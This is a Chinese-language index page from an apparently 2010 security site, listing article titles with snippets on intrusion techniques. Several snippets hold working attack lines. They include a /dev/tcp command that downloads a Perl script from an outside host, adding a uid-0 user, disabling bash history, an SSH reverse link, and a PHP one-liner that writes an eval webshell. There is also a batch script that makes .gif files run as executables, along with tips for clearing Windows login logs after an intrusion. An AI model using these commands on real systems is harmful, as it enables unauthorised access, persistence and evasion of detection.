-
Linux安全#
高级后门技巧:在IIS留后门的方法 实战IIS后门
- 日期:2010-06-26 点击:286公司邮件服务器用的jsp+mysql,windows上必然要用到tomcat。然而tomcat安装以后在windows上默认是system权限,只要得到一个shell,服务器就搞定。所以在服务里面采取了降权的手法,让tomcat服务,以单独账户运行,防止webshell提权想到tomcat权限如此之大,
-
Linux安全#
Linux两个在本地留后门的方法
- 日期:2010-06-26 点击:314方法一:setuid的方法,其实8是很隐蔽。看看过程: [root@localdomain lib]# ls -l |grep ld-linux lrwxrwxrwx 1 root root9 2008-06-07 17:32 ld-linux.so.2 - ld-2.7.so lrwxrwxrwx 1 root root13 2008-06-07 17:47 ld-lsb.so.3 - ld-linux.so.2 [root@loca
-
Linux安全#
UCenter密码算法研究和生成方法解密详解
- 日期:2010-06-26 点击:299康盛的系列产品,包括Discuz、UCHome、Supesite都集成了统一个用户系统UCenter,用户登录的密码也保留在UCenter中,对于其他系统集成或导出数据到UCenter系统,通常会碰到密码生成的题目,这里就讨论一下UCenter的用户密码算法规则和生成方法。 密码通常使用
-
Linux安全#
亲测mssql hash 密码破解方法
- 日期:2010-06-26 点击:242mssql的hash保存在表master.dbo.sysxlogins中,用select name,password from master.dbo.sysxlogins 可以提取用户hash。 0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFAEC02985B27B38059FA3B18349612B 分解: 常量部分:00100 Salt部分
-
Linux安全#
webshell里用rar.exe打包下载整站数据
- 日期:2010-06-26 点击:373很多webshell里没有打包的功能,有打包功能的很多也写的不太好. 在这里给大家介绍一下 使用rar.exe 手动打包的方法。 rar.exe是什么?它就是大名鼎鼎的winrar自带的命令行解压程序。在提权中我们经常要下载各种敏感文件,比如:SU目录。你想一下,如果su目录
-
Linux安全#
Linux系统下history命令的记录如何删除
- 日期:2010-06-24 点击:429history命令的记录如何删除? 1、修改/etc/profile将HISTSIZE=1000改成0或1 清除用户home路径下。bash_history 2、立即清空里的history当前历史命令的记录 history -c 3、bash执行命令时不是马上把命令名称写入history文件的,而是存放在内部的buffer中,等b
-
Linux安全#
原创:全身而退-清除windows登陆日志的几个小技巧
- 日期:2010-06-20 点击:680清除入侵记录在整个渗透中是极为关键的一步,尤其取得重要服务器的时候。如何全身而退,当然得慎重再慎重。 前段时间拿到了一台较为重要的服务器,管理员也算比较精明。而那台服务器至今仍没有丢..嘿嘿。 作为一个负责的管理人员,检查系统是否被入侵,肯定
-
Linux安全#
Linux下几个常规入侵渗透的基本方法
- 日期:2010-06-09 点击:2781.无wget nc等下载工具时下载文件 exec 5/dev/tcp/yese.yi.org/80 echo -e GET /c.pl HTTP/1.0\n 5 cat5 c.pl 2.Linux添加uid为0的用户 useradd -o -u 0 cnbird 3.bash去掉history记录 export HISTSIZE=0 export HISTFILE=/dev/null 4.SSH反向链接 ssh -C -f
-
Linux安全#
webshell制造360漏洞 利用360提权拿服务器附360漏洞利用工具
- 日期:2010-06-06 点击:566首先说明,此贴大部分为转帖,主要目的是备份360漏洞文件:bregdrv.sys和bregdll.dll。 相关文章: 参考一:得一WebShell,目录权限设置很严,C:\progra~1\无权限访问,还好C:\Docume~1\AllUse~1\Documents\目录有可写可读权限, 运行CMD,是2003系统,taskli
-
Linux安全#
原创:利用include函数漏洞,打造超级隐蔽web后门
- 日期:2010-06-04 点击:571前两天nginx和IIS7都爆解析漏洞,搞了几个shell都丢了,于是想寻找一个超级隐蔽的后门方法。无意中发现include这个函数可以把任意文件解析为php执行.网上去搜索include函数漏洞,得到的结果很少.绝大多数是关于文件包含漏洞,比如用变量作为包含对像,这只是
-
Linux安全#
一次内网oracle渗透的笔记
- 日期:2010-06-03 点击:280来自kindle's blog http://key0.cn 一周前的事情了,感觉还是有必要记录下 首先是找到站点注入,但是闭合语句后错误显示,页面没有对应字段,并且输出错误信息,让我很是郁闷。当然这个时候大家都会想到UTL_HTTP.request方式,是的,但是很是不方便。我这里
-
Linux安全#
一句强大的php代码--生成php一句话小马的后门
- 日期:2010-06-03 点击:758?fputs(fopen(linuxso.php,w),?eval(\$_POST[linuxso]);?)? 这样访问之后,在当前目录生成linuxso.php 内容为 ?eval($_POST[linuxso]);?)? 的一句话小马,密码为 linuxso
-
Linux安全#
gif文件当做木马exe来运行
- 日期:2010-05-31 点击:286更改exe为gif: @echo off color 1A ECHO Windows Registry Editor Version 5.00gif.reg ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]gif.reg ECHO Content Type=application/x-msdownloadgif.reg ECHO @=exefilegif.reg regedit /s gif.regnul 2nul de
-
Linux安全#
如何获取htpasswd方式的登录账号和密码
- 日期:2010-05-31 点击:314网上找资料不那么好找,但解决方法是非常简单: 在htpasswd的浏览器验证通过之后的每次请求都会带有Authorization这个request header,把这个header直接用标准base64解码后就会得到明文的用户名和密码这个头会从代理穿到后台,所以程序直接就能取到,解码就
-
Linux安全#
推荐:Linux下的内网反弹实例详解
- 日期:2010-05-29 点击:236推荐:Linux下的内网反弹实例详解被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105
hack的操作用机-----我的电脑 192.168.1.101
-
Linux安全#
寻找搜索型注入点和搜索型注入漏洞注入方法
- 日期:2010-05-29 点击:574目前,一些网站为了方便用户查找网站的资源,都对用户提供了搜索的功能,因为是搜索功能,往往是程序员在编写代码时都忽略了对其变量(参数)的过滤,而且这样的漏洞在国内的系统中普遍的存在,常见的搜索功能代码如下: .................. keyword=trim(request.Fro
-
Linux安全#
apache的php扩展名解析漏洞最新利用及防御
- 日期:2010-05-29 点击:235windows2003 + IIS6.0环境下,如果目录结构中有xxx.asp这样的目录,那么所有这个目录下的文件不管扩展名为什么,都会当作asp来解析。我们一般称这个漏洞为windows2003+iis6.0目录解析漏洞。但是大家可能不知道的是,apache服务器也存在类似的解析漏洞 我们来
- 首页
- 上一页
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 下一页
- 末页
- 共 16页311条
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史